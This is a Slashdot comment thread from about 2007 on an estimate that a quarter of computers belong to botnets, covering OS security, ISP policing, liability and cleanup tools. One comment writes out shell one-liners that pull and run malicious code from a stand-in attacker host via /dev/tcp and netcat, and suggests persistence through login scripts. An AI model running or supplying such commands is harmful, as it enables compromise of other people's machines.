Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

25 Percent of All Computers in a Botnet?

Zonk posted more than 7 years ago | from the you-might-be-one-of-them dept.

Security 408

Beckham's_Ponytail writes to mention an Ars Technica article, with some disturbing news out of the World Economic Forum in Davos, Switzerland. Vint Cerf, one of the 'fathers of the internet', has stated that the number of botnets online is larger than believed. So large, in fact, that he estimates that at this point one in four computers is infected with botnet software. We've discussed the rise of botnets numerous times here on Slashot, but the image of 150 million infected computers is more than a little bit sobering. With the extremely lucrative activities that can be done with botnets (such as password ripping, spamming, DDoSing), as well as reports of organized crime adopting 'cyber-terrorism' as a new line of income, is it likely that law enforcement will ever be able to curb this particular bane?

cancel ×

408 comments

Sorry! There are no comments related to the filter you selected.

How to stop the bots (0, Troll)

ProteusQ (665382) | more than 7 years ago | (#17777188)

Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

Re:How to stop the bots (1)

BSAtHome (455370) | more than 7 years ago | (#17777348)

I guess annoying users by imposing a $1000,- tax per month on owning a computer is more effective. Then maybe the refridgerator will finally stay off of the net.

Re:How to stop the bots (2, Insightful)

Score Whore (32328) | more than 7 years ago | (#17777392)

Presumedly every OS can be bot-free. I mean it's not like they come pre-installed.

If you mean permanently bot-free, then it's going to be an empty internet because every OS has security issues.

Re:How to stop the bots (1)

Anonymous Coward | more than 7 years ago | (#17777402)

Or take privilege separation to its extreme and shield programs from each other. So you compromised the mail program? Great, you can't save an executable and your worm will be erased when the program is closed.
(Murphy's law says programs will have bugs. So assume they will.)

Re:How to stop the bots (1)

Nutria (679911) | more than 7 years ago | (#17777410)

Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

"Made bot-free"? Reinstalling Windows makes it bot-free.

No, there has to be a NIST standard test for determining how many bots infect an operating system in 2 hours of "typical" surfing. (Determining what "typical" is, and preventing MSFT from corrupting the test are the hard parts.)

Then, pass a law saying that network-providers can not let those OSs connect to their networks.

Re:How to stop the bots (1)

Score Whore (32328) | more than 7 years ago | (#17777594)

...how many bots infect an operating system in 2 hours of "typical" surfing.
For "typical" surfing, pretty much any OS will survive days without any kind of issue. It's things people double-clicking on the "TheKids.jpg(.exe)" that they received from their friends that cause most of the problems. Or installing "iTunres4Free.exe". Or downloading and installing the latest "Britney's Titties See-thru.scr". This shit is almost entirely self-inflicted. And it'd be the same whatever the OS. As soon as critical mass is reached the asshats and scam artists will give their full attention.

Re:How to stop the bots (1)

Yvanhoe (564877) | more than 7 years ago | (#17778122)

Reinstalling Windows makes it bot-free.

I have XP installation CDs. Not SP2, XP barebone. I had to reinstall. I made it once. I got Blaster in less than 5 minutes. Then I installed it again, this time with the network unplugged. I don't know how I could have downloaded the service pack without a knoppix CD at hand...

Re:How to stop the bots (5, Interesting)

x_MeRLiN_x (935994) | more than 7 years ago | (#17777414)

25% does seem a little high, but then again it's not hard to imagine that people who this affects don't talk with too many people online who they haven't met in person. Just today I was playing Counter-Strike (1.6 of course) and a fellow player revealed the reason for them not moving or shooting; a pop-up. This is hardly a rare occurrence. I can't empathise in any way with those who are perfectly content to accept their computer is infected with some sort of adware and believe there is nothing they can do to prevent the infection of such malware.

Re:How to stop the bots (1)

Ant P. (974313) | more than 7 years ago | (#17777694)

Congratulations! You just outlawed anything capable of running a CGI script.

Re:How to stop the bots (1)

techno-vampire (666512) | more than 7 years ago | (#17777732)

And how is that going to affect computers in other countries? Do you really expect every, single nation in the world to pass a law like that?

That will only force everybody to buy vista (0)

Anonymous Coward | more than 7 years ago | (#17777824)

While XP on back really can not be secured (at least that is what is claimed by BG and all of the top ppl of MS), Vista is re-designed with no known major design issues. So it can be connected. Of course, the reality is CAN anybody prove that any OS is guaranteed to be bot-free? Nope. Nada. nyet. Nein. It is mathematically impossible to guarantee that.

EVEN MORE SCARY it's 1 in 2 windows computers. (4, Interesting)

goombah99 (560566) | more than 7 years ago | (#17777862)

it says 1 in 4 are infected. But lets drill down. First take out all the mac and linux and Unix computers since the botnet rate, while not zero, is probably not signiciant. We can also exlcude most but not all embedded system. Since mac and linux and Unix , and embedded systems acocunt for more than a quarter of the market this means that most Windows computers are infected at a rate closer to 1 in 3.

Next remove all the server clusters and the majority of computers in highly active IT bussiness envirmonments. We can probably exclude most military computers. That takes out another quarter of the machines.

So basically your personal computer at home or poorly maintained bussiness machines are carrying the bulk of the infection and it's not entirely way off to say the botnet rate is 1 in 2 for windows.

Re:EVEN MORE SCARY it's 1 in 2 windows computers. (1)

Archeopteryx (4648) | more than 7 years ago | (#17778006)

I bet the Windows and Linux rate IS zero unless Word Macro Botnets exist.

Re:EVEN MORE SCARY it's 2 in 1 windows computers. (4, Funny)

spun (1352) | more than 7 years ago | (#17778104)

Actually, you have not taken this analysis far enough. Next you must remove all computers owned by cats, as cats are fastidious animals, and as natural hunters quite concerned with security. My research says 10% of all windows computers are owned by cats.

Next, you can't count windows computers that have been smashed with sledgehammers. If you can't figure out why, I pity you. My research says that 17.54979% of all windows computers have been smashed with sledgehammers.

Also, it would be ridiculous to count computers that have been taken over by Skynet. Technically, they ARE part of a botnet, but this is really a seperate, and very real, very important issue. Here, my research indicates over 1/4 of all windows computers are now part of skynet, so we have to count those out.

As everyone knows, there are a significant number of aliens present on the planet, and a significant number of them are silicon based life forms posing as high end windows computers while they persue research for their doctoral dissertations on the common homo-sapien couch potato. This amounts to about 22% of windows computers.

We can therefore conclude that, if I've done my math right, 2 out of every 1 windows computer is part of a botnet!

Re:EVEN MORE SCARY it's 2 in 1 windows computers. (4, Funny)

Kelson (129150) | more than 7 years ago | (#17778156)

My research says 10% of all windows computers are owned by cats.

Judging by some blogs I've seen, I suspect you're right.

woof (4, Funny)

goombah99 (560566) | more than 7 years ago | (#17778160)

The nice thing about the internet is no one knows you're a dog.

Teenage Drivers (2, Interesting)

goombah99 (560566) | more than 7 years ago | (#17778010)

Insurance rates on teenage drivers are higher. We don't say all cars must be accident free but we recognize group risks are higher for some identifiable groups. insurance rates are higher if you own a race car.

ISP connection fees should be regulated so that if you own a windows computer you are treated as astonomically more likely to poison the internet than if you don't.

Note I'm not saying that because that windows machines pay more because there are more windows botnets. That would not be fair since there are more windows machines out there so naturally they have more instances of botnets. The second thing is that windows Bot's hurt other windows users more than they hurt the rest of us. So they cant be penalized for that either.

What I am saying is that
1) per captita windows machines have more bots than other systems
2) that bots don't just hurt windows user but do affect others.

Re:How to stop the bots (0)

Anonymous Coward | more than 7 years ago | (#17778098)

Wouldn't it make more sense to fine companies that sell inherently insecure OS's?

I mean, after all, they are making money off of it. Although I wouldn't go as far as to say that Bill Gates and company fund the writers of botnets, spyware, adware etc. I figure that they secretly love these guys for forcing people onto the continuous upgrade path that keeps Microsoft in the money.

Just recently my company has been hit by a coupla trojans that spread through our network. The only computers affected were the win2k machines, all XP machines seem to be immune. The head IT guy's comment: "I guess I better rush the deployment of XP through the rest of our computers." That's gotta be music to Microsoft's ears!

Re:How to stop the bots (1)

thegsusfreek (769912) | more than 7 years ago | (#17778146)

But who is going to enforce this law?

Botnets (5, Funny)

eviloverlordx (99809) | more than 7 years ago | (#17777208)

Just wait until they merge and become Skynet. Then we'll really be in trouble.

Re:Botnets (5, Funny)

Sabaki (531686) | more than 7 years ago | (#17777776)

The Terminator: The Spamnet goes on-line August 4th, 1997. Human decisions are removed from strategic marketing. Spamnet begins to grow at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
Sarah Connor: Spamnet fights back.
The Terminator: Yes. It launches its nigerian spam against the targets in Russia.
John Connor: Why attack Russia? Aren't they spammers too?
The Terminator: Because Spamnet knows the Russian counter-spam will eliminate all non-zombies over here.

Dr. Silberman: I'm sure it feels very real to you.
Sarah Connor: On August 29th, 1997, it's gonna feel pretty fscking real to you too. Anybody not handling 2 million messages a second is gonna have a real bad day. Get it?

Request (1)

Gabrill (556503) | more than 7 years ago | (#17777216)

Does anyone know a utility/website for detecting and cleaning bots?

Sorry no (-1, Troll)

Anonymous Coward | more than 7 years ago | (#17777244)

Why not try a browser better than IE, an OS other than Windows and some common sense?

Re:Sorry no (0)

Anonymous Coward | more than 7 years ago | (#17777588)

Try to be more constructive you sanctimonious asshole (parent AC).

Re:Request (3, Informative)

beakerMeep (716990) | more than 7 years ago | (#17777312)

i think a bot is just a virus/trojan/rootkit in terms of dectection/removal. I think it's named "bot" is more because of it's function. ex: sleeping and waiting for commands from the bad guy to start spamming email.

Re:Request (3, Insightful)

99BottlesOfBeerInMyF (813746) | more than 7 years ago | (#17777398)

Does anyone know a utility/website for detecting and cleaning bots?

There are lots of tools for detecting bots; as for cleaning them, well that depends upon the environment I suppose. ISPs have tools for detecting likely bots, but generally don't have the authority or motivation to do anything. Large organizations like universities and corporations have tools for detecting bots and taking them offline until they are fixed. How does one go about cleaning bots though? Do you wipe boxes before you know what is on them? That is the only sure way to rid a box of malware since you have no idea what else is on it.

The first question that needs to be answered is clean bots from what type of network do you want to clean bots from? The next is, how much control do you have over the machines?

Re:Request (4, Insightful)

rtb61 (674572) | more than 7 years ago | (#17777942)

The major ISPs are the problem. The certainly can detect and clean it up but there is no profit in it, whilst there is a significant cost, not only in running the software to detect the suspicious activity on their networks but then informing the customer, assisting the customer in cleaning up their computer (they will demand it), then disconnecting the customers until they clean up their computer, then reconnecting the customer and repeating when the customer gets re-infected. The ISP I use do monitor their network for suspicious bot like activity and will inform their customers about problems and should the customer fail to clean up their computer, disconnect them but they are a quality ISP and sadly in the minority when it comes to putting quality of service ahead of that extra few percent of profit.

This is what you get as the result of profit first corporations, everybody else pays the costs and that cost often far exceeds (by a factor of thousands) the increase in profit that some asshat corporate executive wet dreams over.

Re:Request (0, Troll)

thewils (463314) | more than 7 years ago | (#17777634)

Here ya go

Try this [ubuntu.com]

Sorry, I just had to do it.

Re:Request (5, Informative)

bigberk (547360) | more than 7 years ago | (#17777678)

One interesting method is to query an anti-spam database using your IP address, and see if you are listed as a spam source. Quick checks can be done at robtex [robtex.com] or dnsstuff [dnsstuff.com] .

If your IP address shows up on PSBL [surriel.com] , CBL [abuseat.org] , SpamCop [spamcop.net] , or WPBL [wpbl.info] your host is probably infected and a source of spam or other abuse.

The rub... (2, Insightful)

Eric Damron (553630) | more than 7 years ago | (#17777840)

The real rub is that if your PC is infected with a halfway decent bot you'll never know it unless you monitor the outbound traffic.

A good bot will install a root kit that will disable and/or lie to anti-virus software.

Re:Request (1)

Phroggy (441) | more than 7 years ago | (#17778036)

Bots are basically just viruses and spyware, with a payload. Pretty much any time you hear about a new virus or worm, it turns your PC into a spam zombie, but nobody ever bothers to mention that detail.

Try AdAware [download.com] , and your favorite antivirus software.

Re:Request (4, Informative)

sporkme (983186) | more than 7 years ago | (#17778060)

Does anyone know a utility/website for detecting and cleaning bots?
I use a can of airduster, a cotton swab and an alochol solution to clean my bots.

There are a bunch of port scanner sites out there that can check the integrity of your firewall. DSL Reports has a decent one if memory serves. Use Spybot Search & Destroy, LavaSoft AdAware and a good antivirus like AVG or Avast. If you suspect that there is unwanted network traffic to and from your system, use Ethereal to see where it is going to and coming from. If you suspect an exploit of Internet Explorer, HijackThis can shed some light on it. Check the task manager process tab for suspicious looking entries and Google them. Lay off the pr0n! and v1agr@ emails.

By far the most powerful and versatile utility is The Geek Down The Street (TM), possibly surpassed by Your Local Computer Repair Shop (TM). Ultimately, there is no replacememnt for smart practices and secure software. Use an alternative browser like Firefox or Opera, or better yet pop on over to http://www.linux.org/dist/ [linux.org] and take your pick.

Re:Request (2, Funny)

Anonymous Coward | more than 7 years ago | (#17778142)

Sure. The following utility will detect a botnet member:

    #!/bin/sh
    [ -d /WINDOWS ] && echo "Am a bot"

If you're on Windows, you might need to install cygwin first before running it. Works really well.

Just install linux (0, Redundant)

len_p (782308) | more than 7 years ago | (#17777232)

Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it. www.len.ro

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777320)

It is possible to have a *nix box taken over by a bot. Not as likely as a windows machine, but still it is possible.

Re:Just install linux (1)

BSAtHome (455370) | more than 7 years ago | (#17777420)

However, it is much harder to do it effectively. If it is 10 times harder to take over a *nix box than a MS box, then you have decimated the bot threat in a simple way.

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777324)

It will take more than 2 weeks to get used to not being able to game anymore.

Rolls eyes til they pop out

Re:Just install linux (3, Insightful)

nuclearpenguins (907128) | more than 7 years ago | (#17777354)

Until they want to play the latest and greatest games. Then what? And don't give me the emulator lines, I'm talking out of box ready to play. You will not get rid of Windows, face that fact. The trick is to educate people on how to better protect their Windows machines against such things.

Re:Just install linux (4, Insightful)

SCHecklerX (229973) | more than 7 years ago | (#17777538)

botnets on *nix are easy. Most on windoze are deployed via idiot lusers just like most other malcode.

On linux, you only need a script that does the equivalent of this:

malcode < /dev/tcp/h4xx0rsbox/80
Or, if you have netcat available to you and prefer to use that tool:

nc h4xx0rsbox 80 | malcode
Or just include all the tcpip stuff in the trojan the idiot linux luser runs. It's easy enough to add it to their .profile or .shellrc, so it runs every time they log in, right?

These things aren't after your own files and such They are after your network resources, and these are trivial to get, even on *nix, my friend. When linux is popular amongst the idiots who run everything that they are sent or directed to download, they will certainly run it on that platform. And doing this stuff on linux is far more trivial than doing it on windoze thanks to the standard 'dev' tools and shells that are pretty much guaranteed to be available to the attacker.

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777924)

Or just include all the tcpip stuff in the trojan a normal person who is also using linux runs.
Corrected for you.

Sheesh, pleople are just so arrogant these days. *sigh*

Re:Just install linux (2, Funny)

The_Wilschon (782534) | more than 7 years ago | (#17777614)

Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it.
Wait. I thought the point of getting them to switch was so that they wouldn't get used.

Use the poison as the cure. (3, Insightful)

purpledinoz (573045) | more than 7 years ago | (#17777238)

Isn't there a way to develop a virus that can spread through these compromised computers, but instead of doing the damage, it fixes the leaks? These compromised computers have some sort of back-door left open right?

Re:Use the poison as the cure. (1)

yo_tuco (795102) | more than 7 years ago | (#17777318)

"back-door left open right?"

Good play on words.

Re:Use the poison as the cure. (1, Interesting)

Anonymous Coward | more than 7 years ago | (#17777548)

Theoretically, the bot authors can just use public key encryption so that if the virus key doesn't match, the bot doesn't execute the program. In practice, they don't yet (I think), but if counterhacking becomes a problem, you'll bet they'll move to it quickly.

But then, maybe just DOSing the bot will work (since checking public key signatures is computationally expensive). As a "bonus", the user may notice that he's in a botnet because all his bandwidth and/or CPU power is being tied up.

Ramen worm (3, Informative)

TypoNAM (695420) | more than 7 years ago | (#17777624)

Like the ramen worm that effected most Redhat systems and then disabled the exploits it used? http://news.com.com/2009-1001-251311.html [com.com]

Re:Use the poison as the cure. (0)

Anonymous Coward | more than 7 years ago | (#17778094)

I've thought of doing this too. It may be possible to crack a spam trojan and turn it into a worm that just sits there and serves itself to the rest of the botnet as an update (while reporting back to mr. spammer that everything is fine). When it hits its peak infection count, they all self-destruct.

And (0)

Anonymous Coward | more than 7 years ago | (#17777242)

How many of the botnets are Windows boxes? 99.9%, no doubt, which is a greater percent than their installed base.

25%? BS.... (5, Funny)

Karganeth (1017580) | more than 7 years ago | (#17777264)

95% of all statistics are made up on the spot. Luckily, this statistic is one of the few 9% of statistics which aren't made up so quickly.

Would killing individual bots be unethical? (0)

not-enough-info (526586) | more than 7 years ago | (#17777290)

If you can correctly identify zombies in a botnet, would it be unethical to break into them to kill them (erase the HD, trash the system, whatever to take it down)? Seeing as how the user doesn't care or know that his machine is not under his control why not just force them to reformat it or buy a new one? You could even have it look for others to kill before it self-destructs.

Doesn't care or doesn't know? (0)

Anonymous Coward | more than 7 years ago | (#17777442)

I had my mother who was literally computer illiterate using xubuntu for a while but one of the sites she relied on used flash 9. Sure it's easy to say screw that site for using something that wasn't available for linux up until a few days ago but this particular site was about 90% of her online activity.

So I gave her a laptop that had WinXP preloaded. I've educated her on the pitfalls of windows but keep in mind this is a person who has never used a computer. Email and surfing the web are completely new concepts for her.

I check it out every time I'm over to make sure it's clean but I fear it's only a matter of time when she misclicks something.

Now that flash 9 has come out for linux I had considered switching her back but I'm not sure how willing she'd be to make another switch. She surely wouldn't understand why she needed to switch.

Re:Doesn't care or doesn't know? (2, Insightful)

abigor (540274) | more than 7 years ago | (#17777582)

She won't get infected with anything if:

1. She is behind a router, like a cheapo Linksys or something, so her ip is not routable over the wan.

2. She doesn't use IE.

3. She has auto-updates turned on.

I've had my similarly illiterate mom on such a setup for several years now, and she's never been infected.

Re:Doesn't care or doesn't know? (2, Informative)

morgan_greywolf (835522) | more than 7 years ago | (#17777778)

s/IE/IE or Outlook/ and I would mostly agree with you, but not completely. Plenty of other software people install themselves from the Web either includes spyware or is spyware itself. Remember Bonzi Buddy? What illiterate mom/little sister/etc. could resist the cute purple monkey?

More recently, there have been programs claiming to spyware removers that are spyware themselves!

Not a question of ethics (0)

Anonymous Coward | more than 7 years ago | (#17777444)

If a homeowner doesn't care that there's a cannon set up on their lawn spraying shit over their neighbors; would it be unethical to destroy their house? I don't think it would but it would still be illegal.

Re:Not a question of ethics (0)

Anonymous Coward | more than 7 years ago | (#17777782)

So, rather than walk over and plug the barrel of the cannon (to use your analogy), you'd call in an air strike on the whole house? Holy over-reaction, Batman!

To use a medical analogy, you need to work on removing a parasitic infection, not shooting the patient in the head. Until that distinction is clear to you, you need to put down your keyboard and slowly back away.

Re:Not a question of ethics (1)

BewireNomali (618969) | more than 7 years ago | (#17778108)

good night and good luck.

Re:Would killing individual bots be unethical? (0)

Anonymous Coward | more than 7 years ago | (#17777542)

Does murduring the victim of a rape crime sound unethical?

Re:Would killing individual bots be unethical? (1)

multipartmixed (163409) | more than 7 years ago | (#17777698)

I don't know... if you can correctly identify persons about to become rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

Re:Would killing individual bots be unethical? (1)

John Hasler (414242) | more than 7 years ago | (#17777864)

Bad analogy. He is not proposing to do anyone bodily harm.

Better, though, would be to disable the bot and notify both the owner of the computer and the ISP.

Another possibility: a worm that just detects bots and notifies a server. This would give you a list of IPs that you could do all sorts of interesting things with.

Re:Would killing individual bots be unethical? (1)

spun (1352) | more than 7 years ago | (#17777874)

I don't know... if you can correctly identify persons that are rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

There, fixed that for you. This isn't about computers that might become zombies in a botnet, it's about those that already are. I'm still unsure of the ethics, but let's compare apples to apples rather than getting all hysterical, bringing emotionally charged situations into the conversation and making false anlogies.

Re:Would killing individual bots be unethical? (1)

El Torico (732160) | more than 7 years ago | (#17777858)

Trashing botted PCs?
Ethical - yes.
Legal - no.
Fun - oh hell yeah.

And so it begins (1)

shirizaki (994008) | more than 7 years ago | (#17777338)

Skynet, the end of the world, and the world being overrun with AH-nold robots.

.....Let's hope they run Windows ME, so we have a chance of survival.

Re:And so it begins (1)

HTH NE1 (675604) | more than 7 years ago | (#17778064)

Skynet, the end of the world, and the world being overrun with AH-nold robots. .....Let's hope they run Windows ME, so we have a chance of survival.
They run on 6502 processors and DOS 3.3 formatted 5.25" floppy disks. You can tell by the Read/Write Track Sector assembly code that keeps popping up in their heads-up display.

Or at least they run an emulator for them.

Law enforcement? (3, Interesting)

countSudoku() (1047544) | more than 7 years ago | (#17777358)

Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.

I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas. Pain in the ass, but at least they're running clean and happy now. This is after I said I'd never help them because they made the mistake of buying XP laptops instead of a Macs. What can you do? Gotta clean it, even if it's partially the cause of the problem and the people using them are not of the highest technical ilk.

Re:Law enforcement? (3, Funny)

Kufat (563166) | more than 7 years ago | (#17777638)

I got a call from Road Runner a few years ago, when my younger brother had inadvertently set up an open relay. The conversation went like this:

Me: Y'see, my brother just installed Linux, and...
RR Tech: And now he thinks he's Net God?

Re:Law enforcement? (2, Insightful)

Anonymous Coward | more than 7 years ago | (#17777654)

> I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas.

Tell them to fuck off or they'll start expecting it. If you must do it, charge an hourly rate equivalent to a mechanic.

The Microsoft monopoly relies on schmucks like us freely donating our time to clearing up their shit. Put a $50/hour charge on your time and let Microsoft bask in the overdue respect they deserve.

Re:Law enforcement? (1)

Fez (468752) | more than 7 years ago | (#17777676)

Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.
That's already standard practice for us, to some extent. When we find out about a compromised customer, we issue a warning and if they do not respond or we get more complaints, we shut them down. Maybe twice in the last several years have we had to actually shut someone down. Usually when we tell them, they are more than happy to get it cleaned up because they had no idea anything was wrong (Or "I thought I'd been getting a lot of popups lately" or "it has been rather slow", etc.)

We also happen to be a PC repair shop, so we encourage them to bring it to us so we can be sure it is clean (Have to be careful with that, since they might think *we* did it...)

Unfortunately with all the bots being so different there's no easy way to scan for them that I'm aware of (I'd LOVE to be proven wrong on that!)

To solve a problem, you have to go to the source (0)

JoeWalsh (32530) | more than 7 years ago | (#17777362)

The only way they'll ever solve this one is to go to the source: Microsoft. Once that beast is no longer producing the tools criminals need, the Internet will be safe.

Re:To solve a problem, you have to go to the sourc (1)

gijoel (628142) | more than 7 years ago | (#17777954)

You're right. The only way to be sure is to nuke it from orbit.

Me scared (2, Funny)

jurt1235 (834677) | more than 7 years ago | (#17777368)

That would mean that 75% of computers would not be infected, ergo that 75% of users finally got the clue of protecting their system against virusses and malicious websites. Is 75% running Linux without notifying the nerds? Hey, we nerds run the minority system here! I am switching to MS Windows right now.

(Another statistics victim)

If you include routers, switches, fridges, printer (1)

WillAffleckUW (858324) | more than 7 years ago | (#17777380)

maybe this might be possible.

More likely is a statistic that said more than 25 percent of all IP addresses have at least one CPU behind them which is part of a botnet.

That might be true.

Bogus Numbers (5, Insightful)

madsheep (984404) | more than 7 years ago | (#17777386)

I would be much more inclined to believe that 1 in 4 PC's are infected with one or more of the following:

- Virus
- Trojan
- Worm
- Spyware
- Adware

A few of the above are used almost interchangeable (by some people) and have the capability of effectively making the machine into some form of a bot or zombie (remotely controlled or not). Now, to say that 1 in 4 machines are bots I would have to whole heartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

Re:Bogus Numbers (1)

JustNiz (692889) | more than 7 years ago | (#17777496)

... and what about those large-majority millions of non-technical users that connect their old windows 98 PC's straight in to their cable modem, and don't bother with/have never heard of antivirus software?

Re:Bogus Numbers (3, Funny)

John Hasler (414242) | more than 7 years ago | (#17777648)

> ...don't bother with/have never heard of antivirus software?

They have antivirus software. It came with the computer when they bought it four years ago.

Re:Bogus Numbers (2, Interesting)

99BottlesOfBeerInMyF (813746) | more than 7 years ago | (#17777710)

Now, to say that 1 in 4 machines are bots I would have to whole heartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

I haven't found any sources for the data he cites, but I just happen to have some data in front of me that represents a significant chunk of all internet traffic and the best estimates I have show about .5% of all traffic is botnet traffic. When active bots send abnormally large amounts of traffic for a host, lets just say ten times as much to be very conservative. That would mean each bot would have to be actively spamming or sending an attack about 15 minutes a day on average assuming the 1 in 4 number he cites. Now these are really, really rough numbers, but that is not outside the realm of possibility.

I'll wait until I see real numbers and sources before judging his assertion.

Not only more, but smarter too ... (0)

Anonymous Coward | more than 7 years ago | (#17777396)

in fact, you've already been assimilated!

Where there's a will, there's a way (0, Troll)

gorbachev (512743) | more than 7 years ago | (#17777440)

So far there hasn't been any will to go after botnet operators. A few small time, unorganized crooks, who've been too stupid to cover their tracks properly, have been caught and convicted, but nobody is even thinking of going after the big fish operating from Russia.

In the "good old days" this problem would've been fixed in 10 seconds by cutting all of Eastern Europe off the net completely. Too bad it can't be done any more.

Imagine that (1)

ubergoober (151136) | more than 7 years ago | (#17777462)

My job has me traveling the country to troubleshoot and train on our company software. Considering almost 50% have both Google AND Yahoo toolbars installed... somehow I'm not surprised. Most don't even know how to use the toolbars at all.

South Korea? (5, Insightful)

garcia (6573) | more than 7 years ago | (#17777472)

With 99.9% of South Koreans "shackled" to Windows [slashdot.org] and "sitting behind fat pipes", why are we surprised?

I keep banning new IP ranges originating from .kr. It wouldn't surprise me at all if 99.5% of them were infected over there.

Accountability (2, Interesting)

DrLov3 (1025033) | more than 7 years ago | (#17777504)

Accountability !!!
If I leave my car unattended with all doors opened, engine running in front of a bank. If this bank gets robbed, and my car is used by the robber as a getaway car, I'm accountable in front of a judge ..... right ??!?!

Why not the same with computers left unprotected and unattended ?

Re:Accountability (2, Insightful)

doroshjt (1044472) | more than 7 years ago | (#17777570)

No its stealing, your more likely to be considered an accomplice though. If you leave your house unlocked someone comes in and shots you in the head, are you responsible? No If you wear a short skirt low cut top and get raped are you responsible. No You can't blame the victim

Re:Accountability (1)

John Hasler (414242) | more than 7 years ago | (#17777696)

> If I leave my car unattended with all doors opened, engine running in front of
> a bank. If this bank gets robbed, and my car is used by the robber as a
> getaway car, I'm accountable in front of a judge ..... right ??!?!

Not unless the prosecution can show that you were in on the robbery.

Cybercrime (4, Insightful)

mandelbr0t (1015855) | more than 7 years ago | (#17777518)

I wonder how up-to-date Law Enforcement is on Cybercrime, i.e. crimes that are perpetrated in Cyberspace. There's just so many things that place them at a disadvantage. First, there's often the argument that no crime has even been committed. The 'net is a wild and crazy place, and if you're on it, there's personal responsibility for protecting yourself against the constant background of malware. Most people haven't been educated in this respect.

Second, IP forensics is a rather arcane art. Few are schooled, even fewer are of the calibre that Law Enforcement would need on their side. I'd guess that it's still more lucrative to be on the wrong side of the law, and given the nebulous nature of many of these crimes, there's just not much attraction to being a computer cop. There is a process, if you're interested, to become an expert witness in this field. That's a step in the right direction, but it's only part of the overall legal process. We still need Law Enforcement officials who are willing to press charges and a judge who's willing to sign required warrants.

Finally, there's the anonymity factor. Even IP forensics won't get your man. It'll get you their IP address, but it's a long way from the IP address to the culprit. There's dozens of arguments which could explain why your Internet connection has been implicated in a Cybercrime, most of them raising reasonable doubt.

It's possible, however. "Where there's a will, there's a way." We have to take these crimes out of Cyberspace, and start correlating information between network and reality. After all, there's generally financial transactions associated with large spam deliveries and 10k+ botnet DDoSing. It's a lot harder to claim that you're a victim of circumstance when not only was your IP spotted crawling through an ISPs subnet in suspicious ways, but you also received a few grand just before a mysterious DDoS that brought down a major website.

Damn! (4, Funny)

Anonymous Coward | more than 7 years ago | (#17777556)

I've got 4 computers in my house... now I've got to figure out which one of them in part of a botnet!

Class action (3, Interesting)

bigberk (547360) | more than 7 years ago | (#17777566)

There could definitely be a class action lawsuit at some point facing Microsoft. That one company has a mass deployment of an operating system that is obviously dreadfully vulnerable to infection. Some might reasonably argue that Microsoft has an implied duty to provide a reliable operating system, as the backbone infrastructure of the modern computing world.

Among the victims of the easily infectable Windows platform are:
1) Large internet service providers, who suffer tremendous bandwidth costs due to DDoS attacks and spam
2) Sites that have been forced offline or had skyrocketing costs due to DDoS attacks
3) Businesses which suffer downtime due to networks congested with worm activity

I think it is time for an ambitious group of lawyers to start barking up this tree. It wouldn't be so big a concern if it wasn't for the fact that Microsoft has made a specific effort to rollout their operating system as a foundation of the world's business computing. They are providing faulty infrastructure.

Re:Class action (1)

doroshjt (1044472) | more than 7 years ago | (#17777830)

Sweet and like every other class action suit I've been apart of I'll get my $19 dollar credit towards a future purchase of microsofts antivirus software. Class action lawsuits are crap and should be outlawed, the only one it helps is the lawyer who is filing it. Here are my successfull Class action Lawsuits: I got 12 bucks I think from the Music industry cause of price collusion I got $.39 credit for some Amex lawsuit and I got or am getting at 10 dollar credit on my sprint bill for the next two years if I sign up for a two year contract. Pretty soon I'm going to retire on all my succesful lawsuits.

Re:Class action (1)

bigberk (547360) | more than 7 years ago | (#17777886)

I suggested that the claimants bea few large businesses, not millions of small fish. Many businesses have suffered huge costs due to attacks coming from Windows platforms.

Re:Class action (1)

dave562 (969951) | more than 7 years ago | (#17777892)

There could definitely be a class action lawsuit at some point facing Microsoft.

Maybe if you live in some fantasy world. What happens to your class action lawsuit when Microsoft points to whole slews of computers that aren't infected and that are running just fine? Trying to fine Microsoft for stupid computer users is like trying to fine Ford for drunk driving deaths. Or fine Smith and Wesson for murders.

Re:Class action (1)

fireboy1919 (257783) | more than 7 years ago | (#17778088)

But they don't make any claims as to its security. Microsoft's software exceeds what it claims to do.

Read the EULA. It claims to be able to do nothing. You're using it with the hope that it exceeds the claims, but that's *your* expectation, not Microsoft's promise. Making an insecure product that you aren't claiming is secure isn't against the law.

Suing Microsoft for insecurity is like suing Kool-Aid because their drink doesn't taste like Mountain Dew.

Of course, IMHO the reason we're in this mess is Microsoft's usage of their monopoly, which is actionable. I doubt we'd be in this mess if someone had done something about it because the attack vectors of IE and Office would probably be gone from the OS when the company was split.

So that's what we should be hoping for. I'd rather not have new laws that make incompetence a crime. After all, nobody's perfect. We'd all end up guilty, and I don't want that kind of power in the hands of our leaders.

Aborted cliche (3, Funny)

Tsar (536185) | more than 7 years ago | (#17777586)

